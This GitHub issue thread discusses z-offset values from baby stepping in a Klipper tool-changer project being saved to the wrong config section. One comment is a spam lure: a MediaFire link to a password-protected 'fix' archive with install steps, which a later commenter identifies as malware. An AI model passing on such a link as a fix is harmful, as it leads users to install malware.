### ISSUE TITLE
z-offset is not correctly saved

### ISSUE THREAD

**Issue by VIN-y** [VIN-y/MissChanger#28]
when you click `SAVE_CONFIG` after baby stepping, the result is saved as:
```
#*# [tool_probe_endstop]
#*# z_offset = -0.647
```
which is wrong and not going to be used in to the system regardless.

It is good that the values does not overwrite or messed up other values if the accidental clicks were to happened. However, it would be nice to be able to retain the various way to save the baby step results.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by VIN-y** [comment]
@goncastrum  I don't know how familiar with Github and all of that. Regardless, linking to some random with the most generic description there is, i.e.:

> to fix your trouble try this fix

is the best way to get reported and banned.

So explain yourself, before I do that.

**Comment by iam-py-test** [comment]
@VIN-y they are a known spam bot. The MediaFire link downloads a password-protected archive containing an unknown piece of malware:
https://github.com/hagezi/dns-blocklists/issues/3598
https://www.virustotal.com/gui/file/1f79a95f6bde6c375a9d60dfba8c02fd463d2cbe1d2d7a38eaa0ba403d3529d0/detection
Thanks

**Comment by VIN-y** [comment]
Interestingly. Different material prefers different z-offset on the same tool-head. So more work need to be done per tool-head after the calibration via the calibration probe. The Nudge probe works fantastically for multi-colour tool-changes.

**Comment by VIN-y** [comment]
What I have been doing so far is to let the system safe the default (but is now irrelevant) variable `[tool_probe_endstop]`. Then manually go to `printer.cfg` to copy-paste the value to the correct section.

**Comment by VIN-y** [comment]
Ultimately, I do not want to tamper with klipper's core functions. Therefore, as long as the issue is a tolerable one, no action will be done here.
